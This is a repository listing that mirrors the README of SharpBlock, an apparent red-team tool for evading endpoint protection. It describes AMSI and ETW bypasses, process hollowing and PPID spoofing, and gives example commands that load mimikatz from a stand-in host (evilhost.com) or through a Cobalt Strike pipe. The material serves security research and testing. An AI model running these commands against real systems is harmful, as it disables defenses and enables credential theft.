https://github.com/CCob/SharpBlock

A method of bypassing EDR's active projection DLL's by preventing entry point exection
https://github.com/CCob/SharpBlock

Last synced: 7 months ago
JSON representation

A method of bypassing EDR's active projection DLL's by preventing entry point exection

• Host: GitHub
• URL: https://github.com/CCob/SharpBlock
• Owner: CCob
• Created: 2020-06-14T10:32:16.000Z (almost 6 years ago)
• Default Branch: master
• Last Pushed: 2021-03-31T09:44:48.000Z (about 5 years ago)
• Last Synced: 2025-05-23T21:06:41.074Z (11 months ago)
• Language: C#
• Size: 242 KB
• Stars: 1,143
• Watchers: 19
• Forks: 160
• Open Issues: 2
• Metadata Files:
  • Readme: README.md
  • Funding: .github/FUNDING.yml

Awesome Lists containing this project

• Awesome-Red-Teaming - SharpBlock
• awesome-csirt - SharpBlock

README

          
# SharpBlock

A method of bypassing EDR's active projection DLL's by preventing entry point execution.  

## Features

* Blocks EDR DLL entry point execution, which prevents EDR hooks from being placed.

* Patchless AMSI bypass that is undetectable from scanners looking for Amsi.dll code patches at runtime.

* Host process that is replaced with an implant PE that can be loaded from disk, HTTP or named pipe (Cobalt Strike)

* Implanted process is hidden to help evade scanners looking for hollowed processes.

* Command line args are spoofed and implanted after process creation using stealthy EDR detection method.

* Patchless ETW bypass.

* Blocks NtProtectVirtualMemory invocation when callee is within the range of a blocked DLL's address space

```

SharpBlock by @_EthicalChaos_

  DLL Blocking app for child processes x64

  -e, --exe=VALUE            Program to execute (default cmd.exe)

  -a, --args=VALUE           Arguments for program (default null)

  -n, --name=VALUE           Name of DLL to block

  -c, --copyright=VALUE      Copyright string to block

  -p, --product=VALUE        Product string to block

  -d, --description=VALUE    Description string to block

  -s, --spawn=VALUE          Host process to spawn for swapping with the target exe

  -ppid=VALUE                Parent process ID for spawned child (PPID Spoofing)

  -w, --show                 Show the lauched process window instead of the

                               default hide

      --disable-bypass-amsi  Disable AMSI bypassAmsi

      --disable-bypass-cmdline

                             Disable command line bypass

      --disable-bypass-etw   Disable ETW bypass

      --disable-header-patch Disable process hollow detection bypass

  -h, --help                 Display this help

  ```

## Examples

### Launch mimikatz over HTTP using notepad as the host process, blocking SylantStrike's DLL

```

SharpBlock -e http://evilhost.com/mimikatz.bin -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee

```

### Launch mimikatz using Cobalt Strike beacon over named pipe using notepad as the host process, blocking SylantStrike's DLL

```

execute-assembly SharpBlock.exe -e \\.\pipe\mimi -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee

upload_file /home/haxor/mimikatz.exe \\.\pipe\mimi

```

*Note, for the `upload_file` beacon command, load upload.cna into Cobalt Strike's Script Manager*

Accompanying Blog Posts: 

 * https://ethicalchaos.dev/2020/05/27/lets-create-an-edr-and-bypass-it-part-1/

 * https://ethicalchaos.dev/2020/06/14/lets-create-an-edr-and-bypass-it-part-2/

 * https://www.pentestpartners.com/security-blog/patchless-amsi-bypass-using-sharpblock/